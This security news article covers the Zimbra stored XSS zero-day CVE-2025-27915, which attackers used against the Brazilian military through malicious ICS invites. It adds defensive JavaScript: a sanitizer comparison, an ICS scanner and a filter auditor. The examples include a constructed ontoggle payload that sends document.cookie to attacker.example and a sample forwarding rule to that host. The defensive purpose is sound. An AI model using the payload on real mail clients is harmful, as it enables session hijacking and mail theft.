A newly discovered zero-day flaw in Zimbra Collaboration has been exploited in real attacks against military organizations in Brazil. The attackers delivered specially crafted calendar files, known as ICS (iCalendar) files, carrying embedded HTML and JavaScript designed to compromise the recipient's webmail session. The campaign was especially dangerous because it targeted a zero-day vulnerability, one that was unknown to the vendor and unpatched at the time of exploitation.

The vulnerability, tracked as CVE-2025-27915, is a stored cross-site scripting (XSS) flaw in Zimbra's Classic Web Client. The root cause is insufficient sanitization of HTML content embedded in ICS calendar files: the client rendered that HTML as-is, so an attacker could embed JavaScript that executed automatically when a user viewed the malicious calendar event.

In the recent campaign, the attackers sent fake calendar invites that appeared completely legitimate. Once the invite was opened, the hidden script ran from an ontoggle event handler on a <details> element. The ontoggle event fires whenever the element's open state changes, and for an element delivered with the open attribute already set it fires as soon as the element is rendered, so no click is required. This gave the attackers arbitrary JavaScript execution in the victim's Zimbra session, effectively hijacking the email account: reading and stealing sensitive messages, adding hidden forwarding rules, or otherwise manipulating mailbox behavior.
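To make the sanitization failure concrete, here is an added JavaScript example (not Zimbra's code, and not from the original article) that puts a naive filter, one that only strips script tags, next to a hardened allowlist filter. The calendar description string is constructed for the demo; the details/ontoggle shape is the one the public reporting describes, and the attacker.example URL is a placeholder.

```javascript
// Added example: why tag-based filtering misses the ontoggle payload.
// Not Zimbra's code. The description text and attacker.example are
// constructed for this demo.

// Constructed calendar description, as an attacker would place it in an ICS
// DESCRIPTION (or X-ALT-DESC;FMTTYPE=text/html) property.
const MALICIOUS_DESCRIPTION =
  'Meeting agenda attached.' +
  '<details open ontoggle="fetch(\'https://attacker.example/x?c=\'+document.cookie)">' +
  '<summary>Details</summary></details>';

// Naive filter: removes <script> elements and nothing else. A <details open
// ontoggle> payload passes straight through because no <script> tag exists;
// the browser fires the handler as soon as the already-open element renders.
function naiveSanitize(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Hardened filter: tokenise on tags, keep only an allowlist of harmless tags
// with no attributes at all, and HTML-escape every text run. Inline event
// handlers (on*), javascript: URLs and unknown elements cannot survive,
// because attributes are never copied through rather than blocklisted.
const ALLOWED_TAGS = new Set(['b', 'i', 'u', 'p', 'br', 'ul', 'ol', 'li']);

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;');
}

function hardenedSanitize(html) {
  const out = [];
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g;
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out.push(escapeText(html.slice(last, m.index)));
    const name = m[1].toLowerCase();
    const closing = m[0].startsWith('</');
    if (ALLOWED_TAGS.has(name)) out.push(closing ? `</${name}>` : `<${name}>`);
    last = tagRe.lastIndex;
  }
  out.push(escapeText(html.slice(last)));
  return out.join('');
}

// True when the string still carries an inline event handler attribute or a
// javascript: URL, i.e. something a browser would run on render or click.
function containsActiveContent(html) {
  return /<[^>]*\son[a-z]+\s*=/i.test(html) || /javascript:/i.test(html);
}

console.log('naive  :', naiveSanitize(MALICIOUS_DESCRIPTION));
console.log('hardened:', hardenedSanitize(MALICIOUS_DESCRIPTION));
```

The regex tokenizer is used only to keep the demo self-contained; a real web client should run untrusted HTML through a DOM-based sanitizer (a DOMParser pass or a library such as DOMPurify), since hand-written patterns cannot cover every HTML parsing quirk. The property that matters is the same either way: attributes are dropped by default instead of being filtered by a blocklist, so a newly abused event handler name cannot slip through.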

Investigations revealed that one of the most notable lures was disguised as an official message from the Libyan Navy's Office of Protocol, aimed at Brazilian military personnel. The malicious ICS files carried scripts that behaved as data stealers, harvesting email credentials, contacts, and shared folders. The attackers also created a hidden email filter named "Correo" that automatically forwarded incoming messages to an external address under their control.

Zimbra has addressed the issue in ZCS 9.0.0 Patch 44, ZCS 10.0.13, and ZCS 10.1.5, all released on January 27, 2025. All Zimbra users and administrators should update to these versions or later. Note that patching stops new exploitation but does not undo what a script has already done: a forwarding filter or a stolen credential planted before the update survives it, so the upgrade needs to be paired with the checks described below.

The bug affects the 9.0, 10.0, and 10.1 release lines prior to those patch levels, in every case because the Classic Web Client did not properly handle HTML inside ICS calendar files. When a user opens one of these malicious calendar entries, the injected JavaScript runs within the user's authenticated session, giving the attacker the same access to mail and mailbox settings that the user has.

Organizations should treat calendar attachments (.ics files) with the same caution as any other email attachment. Recommended checks include reviewing mail and web client logs for signs of compromise, monitoring for unusual mailbox rules, especially ones that forward mail to external addresses, and inspecting ICS files for embedded HTML, script, or event handler attributes, and for file sizes out of proportion to a calendar invite. Limiting who can upload ICS files, or disabling automatic rendering of their HTML content, also reduces exposure.
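The ICS inspection and mailbox rule checks above can be scripted. The following is an added example, not the article's or Zimbra's code: it unfolds an ICS file per RFC 5545 before scanning so that a payload wrapped across lines is not missed, flags active HTML in the text properties and oversized files, and audits a Sieve-style filter script for redirects to external domains. The ICS text, the filter script, the "# name" rule-comment format, and the domain list are all constructed for the demo and are not Zimbra's exact storage format.

```javascript
// Added example, not Zimbra's code and not from the article: triage helpers for
// the ICS and mailbox-rule checks described above. All sample data is constructed.

// RFC 5545 line unfolding: a line break followed by a space or tab continues the
// previous line. A scanner that skips this step is evaded simply by folding the
// payload in the middle of a word such as "ontoggle".
function unfoldIcs(text) {
  return text.replace(/\r?\n[ \t]/g, '');
}

// Split an ICS file into {name, params, value} records. The name is the text
// before the first ';' or ':', the value is everything after the first ':'.
function parseIcsProperties(text) {
  const props = [];
  for (const line of unfoldIcs(text).split(/\r?\n/)) {
    const colon = line.indexOf(':');
    if (colon < 0) continue;
    const [name, ...params] = line.slice(0, colon).split(';');
    props.push({ name: name.toUpperCase(), params, value: line.slice(colon + 1) });
  }
  return props;
}

// Properties a calendar client renders as text (possibly as HTML), and patterns
// that indicate the text is meant to execute rather than display.
const TEXT_PROPS = new Set(['SUMMARY', 'DESCRIPTION', 'X-ALT-DESC', 'LOCATION', 'COMMENT']);
const ACTIVE_HTML = [
  { id: 'event-handler',  re: /<[^>]*\son[a-z]+\s*=/i },    // ontoggle=, onerror=, ...
  { id: 'script-tag',     re: /<script\b/i },
  { id: 'javascript-url', re: /javascript:/i },
  { id: 'embedded-frame', re: /<(iframe|object|embed)\b/i },
];

// One finding per (pattern, property) hit, plus a size finding for files far
// larger than a calendar invite has any reason to be.
function scanIcs(text, maxBytes = 64 * 1024) {
  const findings = [];
  if (new TextEncoder().encode(text).length > maxBytes) {
    findings.push({ id: 'oversized', prop: null });
  }
  for (const p of parseIcsProperties(text)) {
    if (!TEXT_PROPS.has(p.name)) continue;
    for (const rule of ACTIVE_HTML) {
      if (rule.re.test(p.value)) findings.push({ id: rule.id, prop: p.name });
    }
  }
  return findings;
}

// Mailbox filter audit over a Sieve-style script. Assumed (not Zimbra-exact)
// format: a "# name" comment names the rule that follows, and forwarding is a
// redirect "address"; action. Every redirect to a domain outside the
// organisation's own domains is reported together with the rule name.
function auditFilterScript(script, ownDomains) {
  const own = new Set(ownDomains.map((d) => d.toLowerCase()));
  const suspicious = [];
  let ruleName = '(unnamed)';
  for (const raw of script.split(/\r?\n/)) {
    const line = raw.trim();
    const nameMatch = /^#\s*(.+)$/.exec(line);
    if (nameMatch) { ruleName = nameMatch[1]; continue; }
    const redirect = /\bredirect\s+"([^"]+)"/i.exec(line);
    if (!redirect) continue;
    const domain = redirect[1].split('@').pop().toLowerCase();
    if (!own.has(domain)) suspicious.push({ rule: ruleName, to: redirect[1] });
  }
  return suspicious;
}

// Constructed sample invite: the ontoggle payload folded across lines the way an
// ICS writer wraps any long DESCRIPTION; attacker.example is a placeholder.
const SAMPLE_ICS = [
  'BEGIN:VCALENDAR',
  'BEGIN:VEVENT',
  'SUMMARY:Protocol meeting',
  'DESCRIPTION:Agenda below.<details open onto',
  ' ggle="fetch(\'https://attacker.example/?c=\'+document.cookie)"><summary>',
  ' Agenda</summary></details>',
  'END:VEVENT',
  'END:VCALENDAR',
].join('\r\n');

// Constructed sample filter script: one benign rule and one hidden forwarder.
const SAMPLE_FILTERS = [
  '# Newsletters',
  'if header :contains "subject" "newsletter" { fileinto "Newsletters"; stop; }',
  '# Correo',
  'if true { redirect "collector@attacker.example"; stop; }',
].join('\n');

console.log(scanIcs(SAMPLE_ICS));
console.log(auditFilterScript(SAMPLE_FILTERS, ['example.org']));
```

Run it against the ICS attachments pulled from the mail store and against each user's exported filter rules; a forwarding rule to an outside domain that the user did not create is the strongest single indicator this campaign leaves behind. Treat the patterns as a triage aid, not a verdict: a hit on SUMMARY or DESCRIPTION means a human should read the raw property, and a clean scan of a single file says nothing about the rest of the mailbox.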

Organizations that suspect they were targeted should isolate affected systems, preserve all logs for forensic analysis, and bring in a professional incident response team. Reporting the incident to the relevant authorities and coordinating with Zimbra's security team can also help limit wider attacks.

In summary, attackers exploited a serious stored XSS zero-day (CVE-2025-27915) in Zimbra's Classic Web Client to target Brazil's military with malicious ICS calendar files. The flaw let them run scripts inside user sessions, steal email, and alter mail settings. Zimbra has patched the issue; administrators should update immediately, check mailboxes for suspicious rules or forwarding filters, and strengthen email security defenses against similar threats.

Stay alert, and keep your security measures updated!
